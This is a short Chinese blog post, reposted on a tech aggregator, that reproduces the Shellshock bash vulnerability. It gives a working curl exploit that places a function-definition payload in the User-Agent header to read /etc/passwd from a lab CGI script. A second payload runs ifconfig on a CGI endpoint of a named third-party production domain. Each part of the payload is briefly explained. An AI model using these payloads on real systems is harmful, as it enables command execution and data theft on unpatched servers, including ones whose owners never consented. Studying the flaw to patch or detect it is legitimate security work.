首页 > 系统服务 > 详细

Shellshock漏洞复现

时间:2019-09-11 17:05:04      阅读:115      评论:0      收藏:0      [点我收藏+]

漏洞分析:

exp:

curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://172.16.20.134:8080/victim.cgi

 (){ } 代表bash函数

  :  bash中相当于python中的pass占位符

 -A  自定义头部信息-H也是可以的

 后面要执行的命令

 漏洞成因调用了bash执行系统命令

如果你对具体源码分析感兴趣,请看这篇知道创于的文章:https://blog.knownsec.com/2014/09/bash_3-0-4-3-command-exec-analysis/

 

复现截图:

技术分享图片

 

乌云shellshock漏洞:

bash破壳漏洞,老漏洞了,请尽快修复吧!

mask 区域
*****cn/cgi-bin/test*****



技术分享图片



漏洞验证

code 区域
curl -A "() { foo;};echo;/sbin/ifconfig" http://rewu.kuwo.cn/cgi-bin/test-cgi



技术分享图片

 

Shellshock漏洞复现

原文:https://www.cnblogs.com/junsec/p/11506854.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!